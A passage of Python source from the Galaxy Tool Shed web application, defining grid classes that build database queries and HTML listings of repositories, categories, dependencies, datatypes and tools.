link=(lambda item: dict(operation="repositories_by_user", id=item.id)),
attach_popup=False,
key="User.username",
),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name",
cols_to_filter=[columns[0]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
# TODO: improve performance by adding a db table associating users with repositories for which they have write access.
username = trans.user.username
clause_list = []
for repository in trans.sa_session.query(model.Repository).filter(
and_(model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false())
):
allow_push = repository.allow_push()
if allow_push:
allow_push_usernames = allow_push.split(",")
if username in allow_push_usernames:
clause_list.append(model.Repository.table.c.id == repository.id)
if clause_list:
return trans.sa_session.query(model.Repository).filter(or_(*clause_list)).join(model.User.table)
# Return an empty query.
return trans.sa_session.query(model.Repository).filter(model.Repository.table.c.id < 0)
class RepositoriesByUserGrid(RepositoryGrid):
title = "Repositories by user"
columns = [
RepositoryGrid.NameColumn(
"Name",
key="name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryGrid.DescriptionColumn("Synopsis", key="description", attach_popup=False),
RepositoryGrid.TypeColumn("Type"),
RepositoryGrid.MetadataRevisionColumn("Metadata<br/>Revisions"),
RepositoryGrid.CategoryColumn("Category", model_class=model.Category, key="Category.name", attach_popup=False),
]
default_filter = dict(deleted="False")
def build_initial_query(self, trans, **kwd):
decoded_user_id = trans.security.decode_id(kwd["user_id"])
filter = trans.app.repository_grid_filter_manager.get_filter(trans)
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE:
return (
trans.sa_session.query(model.Repository)
.filter(model.Repository.table.c.user_id == decoded_user_id)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE_SUITES:
return (
trans.sa_session.query(model.Repository)
.filter(
and_(
model.Repository.type == rt_util.REPOSITORY_SUITE_DEFINITION,
model.Repository.table.c.user_id == decoded_user_id,
)
)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
else:
# The value of filter is None.
return (
trans.sa_session.query(model.Repository)
.filter(
and_(
model.Repository.table.c.deleted == false(),
model.Repository.table.c.deprecated == false(),
model.Repository.table.c.user_id == decoded_user_id,
)
)
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
class RepositoriesInCategoryGrid(RepositoryGrid):
title = "Category"
columns = [
RepositoryGrid.NameColumn(
"Name",
key="name",
link=(lambda item: dict(controller="repository", operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryGrid.DescriptionColumn("Synopsis", key="description", attach_popup=False),
RepositoryGrid.TypeColumn("Type"),
RepositoryGrid.MetadataRevisionColumn("Metadata<br/>Revisions"),
RepositoryGrid.UserColumn(
"Owner",
model_class=model.User,
link=(lambda item: dict(controller="repository", operation="repositories_by_user", id=item.id)),
attach_popup=False,
key="User.username",
),
# Columns that are valid for filtering but are not visible.
RepositoryGrid.EmailColumn("Email", model_class=model.User, key="email", visible=False),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name, description",
cols_to_filter=[columns[0], columns[1]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
category_id = kwd.get("id", None)
filter = trans.app.repository_grid_filter_manager.get_filter(trans)
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE:
if category_id:
category = suc.get_category(trans.app, category_id)
if category:
return (
trans.sa_session.query(model.Repository)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
.filter(model.Category.table.c.name == category.name)
)
return (
trans.sa_session.query(model.Repository)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE_SUITES:
if category_id:
category = suc.get_category(trans.app, category_id)
if category:
return (
trans.sa_session.query(model.Repository)
.filter(model.Repository.type == rt_util.REPOSITORY_SUITE_DEFINITION)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
.filter(model.Category.table.c.name == category.name)
)
return (
trans.sa_session.query(model.Repository)
.filter(model.Repository.type == rt_util.REPOSITORY_SUITE_DEFINITION)
.join(model.RepositoryMetadata.table)
.filter(or_(*trans.app.repository_registry.certified_level_one_clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
else:
# The value of filter is None.
if category_id:
category = suc.get_category(trans.app, category_id)
if category:
return (
trans.sa_session.query(model.Repository)
.filter(
and_(
model.Repository.table.c.deleted == false(),
model.Repository.table.c.deprecated == false(),
)
)
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
.filter(model.Category.table.c.name == category.name)
)
return (
trans.sa_session.query(model.Repository)
.filter(
and_(model.Repository.table.c.deleted == false(), model.Repository.table.c.deprecated == false())
)
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
class RepositoriesIOwnGrid(RepositoryGrid):
title = "Repositories I own"
columns = [
RepositoryGrid.NameColumn(
"Name",
key="name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryGrid.TypeColumn("Type"),
RepositoryGrid.MetadataRevisionColumn("Metadata<br/>Revisions"),
RepositoryGrid.DeprecatedColumn("Deprecated"),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name",
cols_to_filter=[columns[0]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
return (
trans.sa_session.query(model.Repository)
.filter(
and_(model.Repository.table.c.deleted == false(), model.Repository.table.c.user_id == trans.user.id)
)
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
class RepositoriesICanAdministerGrid(RepositoryGrid):
title = "Repositories I can administer"
columns = [
RepositoryGrid.NameColumn(
"Name",
key="name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryGrid.UserColumn("Owner"),
RepositoryGrid.MetadataRevisionColumn("Metadata<br/>Revisions"),
RepositoryGrid.DeprecatedColumn("Deprecated"),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name",
cols_to_filter=[columns[0]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
"""
Retrieve all repositories for which the current user has been granted administrative privileges.
"""
current_user = trans.user
# Build up an or-based clause list containing role table records.
clause_list = []
# Include each of the user's roles.
for ura in current_user.roles:
clause_list.append(model.Role.table.c.id == ura.role_id)
# Include each role associated with each group of which the user is a member.
for uga in current_user.groups:
group = uga.group
for gra in group.roles:
clause_list.append(model.Role.table.c.id == gra.role_id)
# Filter out repositories for which the user does not have the administrative role either directly
# via a role association or indirectly via a group -> role association.
return (
trans.sa_session.query(model.Repository)
.filter(model.Repository.table.c.deleted == false())
.outerjoin(model.RepositoryRoleAssociation.table)
.outerjoin(model.Role.table)
.filter(or_(*clause_list))
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
class RepositoriesMissingToolTestComponentsGrid(RepositoryGrid):
# This grid displays only the latest installable revision of each repository.
title = "Repositories with missing tool test components"
columns = [
RepositoryGrid.NameColumn(
"Name",
key="name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryGrid.LatestInstallableRevisionColumn("Latest Installable Revision"),
RepositoryGrid.UserColumn(
"Owner",
key="User.username",
model_class=model.User,
link=(lambda item: dict(operation="repositories_by_user", id=item.id)),
attach_popup=False,
),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name",
cols_to_filter=[columns[0]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
# Filter by latest installable revisions that contain tools with missing tool test components.
revision_clause_list = []
for repository in trans.sa_session.query(model.Repository).filter(
and_(model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false())
):
changeset_revision = (
grids_util.filter_by_latest_downloadable_changeset_revision_that_has_missing_tool_test_components(
trans, repository
)
)
if changeset_revision:
revision_clause_list.append(model.RepositoryMetadata.table.c.changeset_revision == changeset_revision)
if revision_clause_list:
return (
trans.sa_session.query(model.Repository)
.filter(
and_(model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false())
)
.join(model.RepositoryMetadata)
.filter(or_(*revision_clause_list))
.join(model.User.table)
)
# Return an empty query.
return trans.sa_session.query(model.Repository).filter(model.Repository.table.c.id < 0)
class MyWritableRepositoriesMissingToolTestComponentsGrid(RepositoriesMissingToolTestComponentsGrid):
# This grid displays only the latest installable revision of each repository.
title = "Repositories I can change with missing tool test components"
columns = [col for col in RepositoriesMissingToolTestComponentsGrid.columns]
def build_initial_query(self, trans, **kwd):
# First get all repositories that the current user is authorized to update.
username = trans.user.username
user_clause_list = []
for repository in trans.sa_session.query(model.Repository).filter(
and_(model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false())
):
allow_push = repository.allow_push()
if allow_push:
allow_push_usernames = allow_push.split(",")
if username in allow_push_usernames:
user_clause_list.append(model.Repository.table.c.id == repository.id)
if user_clause_list:
# We have the list of repositories that the current user is authorized to update, so filter
# further by latest installable revisions that contain tools with missing tool test components.
revision_clause_list = []
for repository in (
trans.sa_session.query(model.Repository)
.filter(
and_(model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false())
)
.filter(or_(*user_clause_list))
):
changeset_revision = (
grids_util.filter_by_latest_downloadable_changeset_revision_that_has_missing_tool_test_components(
trans, repository
)
)
if changeset_revision:
revision_clause_list.append(
model.RepositoryMetadata.table.c.changeset_revision == changeset_revision
)
if revision_clause_list:
return (
trans.sa_session.query(model.Repository)
.filter(
and_(
model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false()
)
)
.join(model.User.table)
.filter(or_(*user_clause_list))
.join(model.RepositoryMetadata)
.filter(or_(*revision_clause_list))
)
# Return an empty query.
return trans.sa_session.query(model.Repository).filter(model.Repository.table.c.id < 0)
class DeprecatedRepositoriesIOwnGrid(RepositoriesIOwnGrid):
title = "Deprecated repositories I own"
columns = [
RepositoriesIOwnGrid.NameColumn(
"Name",
key="name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryGrid.TypeColumn("Type"),
RepositoriesIOwnGrid.MetadataRevisionColumn("Metadata<br/>Revisions"),
RepositoriesIOwnGrid.CategoryColumn(
"Category", model_class=model.Category, key="Category.name", attach_popup=False
),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name",
cols_to_filter=[columns[0]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
return (
trans.sa_session.query(model.Repository)
.filter(
and_(
model.Repository.table.c.deleted == false(),
model.Repository.table.c.user_id == trans.user.id,
model.Repository.table.c.deprecated == true(),
)
)
.join(model.User.table)
.outerjoin(model.RepositoryCategoryAssociation.table)
.outerjoin(model.Category.table)
)
class RepositoriesWithInvalidToolsGrid(RepositoryGrid):
# This grid displays only the latest installable revision of each repository.
class InvalidToolConfigColumn(grids.GridColumn):
def __init__(self, col_name):
grids.GridColumn.__init__(self, col_name)
def get_value(self, trans, grid, repository):
# At the time this grid is displayed we know that the received repository will have invalid tools in its latest changeset revision
# that has associated metadata.
val = ""
repository_metadata = grids_util.get_latest_repository_metadata_if_it_includes_invalid_tools(
trans, repository
)
metadata = repository_metadata.metadata
invalid_tools = metadata.get("invalid_tools", [])
if invalid_tools:
for invalid_tool_config in invalid_tools:
href_str = (
'<a href="load_invalid_tool?repository_id=%s&tool_config=%s&changeset_revision=%s">%s</a>'
% (
trans.security.encode_id(repository.id),
invalid_tool_config,
repository_metadata.changeset_revision,
invalid_tool_config,
)
)
val += href_str
val += "<br/>"
val = val.rstrip("<br/>")
return val
title = "Repositories with invalid tools"
columns = [
InvalidToolConfigColumn("Tool config"),
RepositoryGrid.NameColumn(
"Name",
key="name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryGrid.LatestInstallableRevisionColumn("Latest Metadata Revision"),
RepositoryGrid.UserColumn(
"Owner",
key="User.username",
model_class=model.User,
link=(lambda item: dict(operation="repositories_by_user", id=item.id)),
attach_popup=False,
),
]
def build_initial_query(self, trans, **kwd):
# Filter by latest metadata revisions that contain invalid tools.
revision_clause_list = []
for repository in trans.sa_session.query(model.Repository).filter(
and_(model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false())
):
changeset_revision = grids_util.filter_by_latest_metadata_changeset_revision_that_has_invalid_tools(
trans, repository
)
if changeset_revision:
revision_clause_list.append(model.RepositoryMetadata.table.c.changeset_revision == changeset_revision)
if revision_clause_list:
return (
trans.sa_session.query(model.Repository)
.filter(
and_(model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false())
)
.join(model.RepositoryMetadata)
.filter(or_(*revision_clause_list))
.join(model.User.table)
)
# Return an empty query.
return trans.sa_session.query(model.Repository).filter(model.Repository.table.c.id < 0)
class MyWritableRepositoriesWithInvalidToolsGrid(RepositoriesWithInvalidToolsGrid):
# This grid displays only the latest installable revision of each repository.
title = "Repositories I can change with invalid tools"
columns = [col for col in RepositoriesWithInvalidToolsGrid.columns]
def build_initial_query(self, trans, **kwd):
# First get all repositories that the current user is authorized to update.
username = trans.user.username
user_clause_list = []
for repository in trans.sa_session.query(model.Repository).filter(
and_(model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false())
):
allow_push = repository.allow_push()
if allow_push:
allow_push_usernames = allow_push.split(",")
if username in allow_push_usernames:
user_clause_list.append(model.Repository.table.c.id == repository.id)
if user_clause_list:
# We have the list of repositories that the current user is authorized to update, so filter
# further by latest metadata revisions that contain invalid tools.
revision_clause_list = []
for repository in (
trans.sa_session.query(model.Repository)
.filter(
and_(model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false())
)
.filter(or_(*user_clause_list))
):
changeset_revision = grids_util.filter_by_latest_metadata_changeset_revision_that_has_invalid_tools(
trans, repository
)
if changeset_revision:
revision_clause_list.append(
model.RepositoryMetadata.table.c.changeset_revision == changeset_revision
)
if revision_clause_list:
return (
trans.sa_session.query(model.Repository)
.filter(
and_(
model.Repository.table.c.deprecated == false(), model.Repository.table.c.deleted == false()
)
)
.join(model.User.table)
.filter(or_(*user_clause_list))
.join(model.RepositoryMetadata)
.filter(or_(*revision_clause_list))
)
# Return an empty query.
return trans.sa_session.query(model.Repository).filter(model.Repository.table.c.id < 0)
class RepositoryMetadataGrid(grids.Grid):
class RepositoryNameColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
repository = repository_metadata.repository
return escape_html(repository.name)
class RepositoryTypeColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
repository = repository_metadata.repository
type_class = repository.get_type_class(trans.app)
return escape_html(type_class.label)
class RepositoryOwnerColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
repository = repository_metadata.repository
return escape_html(repository.user.username)
class ChangesetRevisionColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
repository = repository_metadata.repository
changeset_revision = repository_metadata.changeset_revision
changeset_revision_label = hg_util.get_revision_label(
trans.app, repository, changeset_revision, include_date=True
)
return changeset_revision_label
class MaliciousColumn(grids.BooleanColumn):
def get_value(self, trans, grid, repository_metadata):
if repository_metadata.malicious:
return "yes"
return ""
class DownloadableColumn(grids.BooleanColumn):
def get_value(self, trans, grid, repository_metadata):
if repository_metadata.downloadable:
return "yes"
return ""
class HasRepositoryDependenciesColumn(grids.BooleanColumn):
def get_value(self, trans, grid, repository_metadata):
if repository_metadata.has_repository_dependencies:
return "yes"
return ""
class IncludesDatatypesColumn(grids.BooleanColumn):
def get_value(self, trans, grid, repository_metadata):
if repository_metadata.includes_datatypes:
return "yes"
return ""
class IncludesToolsColumn(grids.BooleanColumn):
def get_value(self, trans, grid, repository_metadata):
if repository_metadata.includes_tools:
return "yes"
return ""
class IncludesToolDependenciesColumn(grids.BooleanColumn):
def get_value(self, trans, grid, repository_metadata):
if repository_metadata.includes_tool_dependencies:
return "yes"
return ""
class IncludesWorkflowsColumn(grids.BooleanColumn):
def get_value(self, trans, grid, repository_metadata):
if repository_metadata.includes_workflows:
return "yes"
return ""
title = "Repository metadata"
model_class = model.RepositoryMetadata
default_sort_key = "Repository.name"
columns = [
RepositoryNameColumn(
"Repository name",
key="Repository.name",
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
),
RepositoryNameColumn("Type"),
RepositoryOwnerColumn("Owner", model_class=model.User, attach_popup=False, key="User.username"),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name, description",
cols_to_filter=[columns[0], columns[1]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
default_filter = dict(malicious="False")
num_rows_per_page = 50
use_paging = True
allow_fetching_all_results = False
def build_initial_query(self, trans, **kwd):
return (
trans.sa_session.query(model.RepositoryMetadata)
.join(model.Repository)
.filter(and_(model.Repository.table.c.deleted == false(), model.Repository.table.c.deprecated == false()))
.join(model.User.table)
)
class RepositoryDependenciesGrid(RepositoryMetadataGrid):
class RequiredRepositoryColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
rd_str = []
if repository_metadata:
metadata = repository_metadata.metadata
if metadata:
rd_dict = metadata.get("repository_dependencies", {})
if rd_dict:
rd_tups = rd_dict["repository_dependencies"]
# "repository_dependencies": [["http://localhost:9009", "bwa059", "test", "a07baa797d53"]]
# Sort rd_tups by by required repository name.
sorted_rd_tups = sorted(rd_tups, key=lambda rd_tup: rd_tup[1])
for rd_tup in sorted_rd_tups:
name, owner, changeset_revision = rd_tup[1:4]
rd_line = ""
required_repository = repository_util.get_repository_by_name_and_owner(
trans.app, name, owner
)
if required_repository and not required_repository.deleted:
required_repository_id = trans.security.encode_id(required_repository.id)
required_repository_metadata = (
metadata_util.get_repository_metadata_by_repository_id_changeset_revision(
trans.app, required_repository_id, changeset_revision
)
)
if not required_repository_metadata:
updated_changeset_revision = metadata_util.get_next_downloadable_changeset_revision(
trans.app, required_repository, changeset_revision
)
required_repository_metadata = (
metadata_util.get_repository_metadata_by_repository_id_changeset_revision(
trans.app, required_repository_id, updated_changeset_revision
)
)
required_repository_metadata_id = trans.security.encode_id(
required_repository_metadata.id
)
rd_line += f'<a href="browse_repository_dependencies?operation=view_or_manage_repository&id={required_repository_metadata_id}">'
rd_line += f"Repository <b>{escape_html(name)}</b> revision <b>{escape_html(owner)}</b> owned by <b>{escape_html(changeset_revision)}</b>"
if required_repository:
rd_line += "</a>"
rd_str.append(rd_line)
return "<br />".join(rd_str)
title = "Valid repository dependency definitions in this tool shed"
default_sort_key = "Repository.name"
columns = [
RequiredRepositoryColumn("Repository dependency", attach_popup=False),
RepositoryMetadataGrid.RepositoryNameColumn(
"Repository name",
model_class=model.Repository,
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
key="Repository.name",
),
RepositoryMetadataGrid.RepositoryOwnerColumn(
"Owner", model_class=model.User, attach_popup=False, key="User.username"
),
RepositoryMetadataGrid.ChangesetRevisionColumn("Revision", attach_popup=False),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name, owner",
cols_to_filter=[columns[1], columns[2]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
return (
trans.sa_session.query(model.RepositoryMetadata)
.join(model.Repository)
.filter(
and_(
model.RepositoryMetadata.table.c.has_repository_dependencies == true(),
model.Repository.table.c.deleted == false(),
model.Repository.table.c.deprecated == false(),
)
)
.join(model.User.table)
)
class DatatypesGrid(RepositoryMetadataGrid):
class DatatypesColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
datatype_list = []
if repository_metadata:
metadata = repository_metadata.metadata
if metadata:
datatype_dicts = metadata.get("datatypes", [])
if datatype_dicts:
# Create tuples of the attributes we want so we can sort them by extension.
datatype_tups = []
for datatype_dict in datatype_dicts:
# Example: {"display_in_upload": "true", "dtype": "galaxy.datatypes.blast:BlastXml", "extension": "blastxml", "mimetype": "application/xml"}
extension = datatype_dict.get("extension", "")
dtype = datatype_dict.get("dtype", "")
# For now we'll just display extension and dtype.
if extension and dtype:
datatype_tups.append((extension, dtype))
sorted_datatype_tups = sorted(datatype_tups, key=lambda datatype_tup: datatype_tup[0])
for datatype_tup in sorted_datatype_tups:
extension, datatype = datatype_tup[:2]
datatype_str = f'<a href="browse_datatypes?operation=view_or_manage_repository&id={trans.security.encode_id(repository_metadata.id)}">'
datatype_str += f"<b>{escape_html(extension)}:</b> {escape_html(datatype)}"
datatype_str += "</a>"
datatype_list.append(datatype_str)
return "<br />".join(datatype_list)
title = "Custom datatypes in this tool shed"
default_sort_key = "Repository.name"
columns = [
DatatypesColumn("Datatype extension and class", attach_popup=False),
RepositoryMetadataGrid.RepositoryNameColumn(
"Repository name",
model_class=model.Repository,
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
key="Repository.name",
),
RepositoryMetadataGrid.RepositoryOwnerColumn(
"Owner", model_class=model.User, attach_popup=False, key="User.username"
),
RepositoryMetadataGrid.ChangesetRevisionColumn("Revision", attach_popup=False),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name, owner",
cols_to_filter=[columns[1], columns[2]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
return (
trans.sa_session.query(model.RepositoryMetadata)
.join(model.Repository)
.filter(
and_(
model.RepositoryMetadata.table.c.includes_datatypes == true(),
model.Repository.table.c.deleted == false(),
model.Repository.table.c.deprecated == false(),
)
)
.join(model.User.table)
)
class ToolDependenciesGrid(RepositoryMetadataGrid):
class ToolDependencyColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
td_str = ""
if repository_metadata:
metadata = repository_metadata.metadata
if metadata:
tds_dict = metadata.get("tool_dependencies", {})
if tds_dict:
# Example: {"bwa/0.5.9": {"name": "bwa", "type": "package", "version": "0.5.9"}}
sorted_keys = sorted(tds_dict.keys())
num_keys = len(sorted_keys)
# Handle environment settings first.
if "set_environment" in sorted_keys:
# Example: "set_environment": [{"name": "JAVA_JAR_FILE", "type": "set_environment"}]
env_dicts = tds_dict["set_environment"]
num_env_dicts = len(env_dicts)
if num_env_dicts > 0:
td_str += f'<a href="browse_datatypes?operation=view_or_manage_repository&id={trans.security.encode_id(repository_metadata.id)}">'
td_str += "<b>environment:</b> "
td_str += ", ".join(escape_html(env_dict["name"]) for env_dict in env_dicts)
td_str += "</a><br/>"
for index, key in enumerate(sorted_keys):
if key == "set_environment":
continue
td_dict = tds_dict[key]
# Example: {"name": "bwa", "type": "package", "version": "0.5.9"}
name = td_dict["name"]
version = td_dict["version"]
td_str += f'<a href="browse_datatypes?operation=view_or_manage_repository&id={trans.security.encode_id(repository_metadata.id)}">'
td_str += f"<b>{escape_html(name)}</b> version <b>{escape_html(version)}</b>"
td_str += "</a>"
if index < num_keys - 1:
td_str += "<br/>"
return td_str
title = "Tool dependency definitions in this tool shed"
default_sort_key = "Repository.name"
columns = [
ToolDependencyColumn("Tool dependency", attach_popup=False),
RepositoryMetadataGrid.RepositoryNameColumn(
"Repository name",
model_class=model.Repository,
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
key="Repository.name",
),
RepositoryMetadataGrid.RepositoryOwnerColumn(
"Owner", model_class=model.User, attach_popup=False, key="User.username"
),
RepositoryMetadataGrid.ChangesetRevisionColumn("Revision", attach_popup=False),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name, owner",
cols_to_filter=[columns[1], columns[2]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
return (
trans.sa_session.query(model.RepositoryMetadata)
.join(model.Repository)
.filter(
and_(
model.RepositoryMetadata.table.c.includes_tool_dependencies == true(),
model.Repository.table.c.deleted == false(),
model.Repository.table.c.deprecated == false(),
)
)
.join(model.User.table)
)
class ToolsGrid(RepositoryMetadataGrid):
class ToolsColumn(grids.TextColumn):
def get_value(self, trans, grid, repository_metadata):
tool_line = []
if repository_metadata:
metadata = repository_metadata.metadata
if metadata:
tool_dicts = metadata.get("tools", [])
if tool_dicts:
# Create tuples of the attributes we want so we can sort them by extension.
tool_tups = []
for tool_dict in tool_dicts:
tool_id = tool_dict.get("id", "")
version = tool_dict.get("version", "")
# For now we'll just display tool id and version.
if tool_id and version:
tool_tups.append((tool_id, version))
sorted_tool_tups = sorted(tool_tups, key=lambda tool_tup: tool_tup[0])
for tool_tup in sorted_tool_tups:
tool_id, version = tool_tup[:2]
tool_str = f'<a href="browse_datatypes?operation=view_or_manage_repository&id={trans.security.encode_id(repository_metadata.id)}">'
tool_str += f"<b>{escape_html(tool_id)}:</b> {escape_html(version)}"
tool_str += "</a>"
tool_line.append(tool_str)
return "<br />".join(tool_line)
title = "Valid tools in this tool shed"
default_sort_key = "Repository.name"
columns = [
ToolsColumn("Tool id and version", attach_popup=False),
RepositoryMetadataGrid.RepositoryNameColumn(
"Repository name",
model_class=model.Repository,
link=(lambda item: dict(operation="view_or_manage_repository", id=item.id)),
attach_popup=False,
key="Repository.name",
),
RepositoryMetadataGrid.RepositoryOwnerColumn(
"Owner", model_class=model.User, attach_popup=False, key="User.username"
),
RepositoryMetadataGrid.ChangesetRevisionColumn("Revision", attach_popup=False),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name, owner",
cols_to_filter=[columns[1], columns[2]],
key="free-text-search",
visible=False,
filterable="standard",
)
)
def build_initial_query(self, trans, **kwd):
return (
trans.sa_session.query(model.RepositoryMetadata)
.join(model.Repository)
.filter(
and_(
model.RepositoryMetadata.table.c.includes_tools == true(),
model.Repository.table.c.deleted == false(),
model.Repository.table.c.deprecated == false(),
)
)
.join(model.User.table)
)
class ValidCategoryGrid(CategoryGrid):
class RepositoriesColumn(grids.TextColumn):
def get_value(self, trans, grid, category):
category_name = str(category.name)
filter = trans.app.repository_grid_filter_manager.get_filter(trans)
if filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE:
return (
trans.app.repository_registry.certified_level_one_viewable_repositories_and_suites_by_category.get(
category_name, 0
)
)
elif filter == trans.app.repository_grid_filter_manager.filters.CERTIFIED_LEVEL_ONE_SUITES:
return trans.app.repository_registry.certified_level_one_viewable_suites_by_category.get(
category_name, 0
)
elif filter == trans.app.repository_grid_filter_manager.filters.SUITES:
return trans.app.repository_registry.viewable_valid_suites_by_category.get(category_name, 0)
else:
# The value filter is None.
return trans.app.repository_registry.viewable_valid_repositories_and_suites_by_category.get(
category_name, 0
)
title = "Categories of Valid Repositories"
model_class = model.Category
template = "/webapps/tool_shed/category/valid_grid.mako"
default_sort_key = "name"
columns = [
CategoryGrid.NameColumn(
"Name",
key="Category.name",
link=(lambda item: dict(operation="valid_repositories_by_category", id=item.id)),
attach_popup=False,
),
CategoryGrid.DescriptionColumn("Description", key="Category.description", attach_popup=False),
# Columns that are valid for filtering but are not visible.
RepositoriesColumn("Valid repositories", model_class=model.Repository, attach_popup=False),
]
# Override these
num_rows_per_page = 50
class ValidRepositoryGrid(RepositoryGrid):
# This grid filters out repositories that have been marked as either deleted or deprecated.
class CategoryColumn(grids.TextColumn):
def get_value(self, trans, grid, repository):
rval = "<ul>"
if repository.categories:
for rca in repository.categories:
rval += (
'<li><a href="browse_repositories?operation=valid_repositories_by_category&id=%s">%s</a></li>'
% (trans.security.encode_id(rca.category.id), rca.category.name)
)
else:
rval += "<li>not set</li>"
rval += "</ul>"
return rval
class RepositoryCategoryColumn(grids.GridColumn):
def filter(self, trans, user, query, column_filter):
"""Modify query to filter by category."""
if column_filter == "All":
return query
return query.filter(model.Category.name == column_filter)
class InstallableRevisionColumn(grids.GridColumn):
def __init__(self, col_name):
grids.GridColumn.__init__(self, col_name)
def get_value(self, trans, grid, repository):
"""Display a SelectField whose options are the changeset_revision strings of all download-able revisions of this repository."""
select_field = grids_util.build_changeset_revision_select_field(trans, repository, downloadable=True)
if len(select_field.options) > 1:
tmpl = f"<select name='{select_field.name}'>"
for o in select_field.options:
tmpl += f"<option value='{o[1]}'>{o[0]}</option>"
tmpl += "</select>"
return tmpl
elif len(select_field.options) == 1:
return select_field.options[0][0]
return ""
title = "Valid Repositories"
columns = [
RepositoryGrid.NameColumn("Name", key="name", attach_popup=True),
RepositoryGrid.DescriptionColumn("Synopsis", key="description", attach_popup=False),
RepositoryGrid.TypeColumn("Type"),
InstallableRevisionColumn("Installable Revisions"),
RepositoryGrid.UserColumn("Owner", model_class=model.User, attach_popup=False),
# Columns that are valid for filtering but are not visible.
RepositoryCategoryColumn("Category", model_class=model.Category, key="Category.name", visible=False),
]
columns.append(
grids.MulticolFilterColumn(
"Search repository name, description",
cols_to_filter=[columns[0], columns[1]],
key="free-text-search",
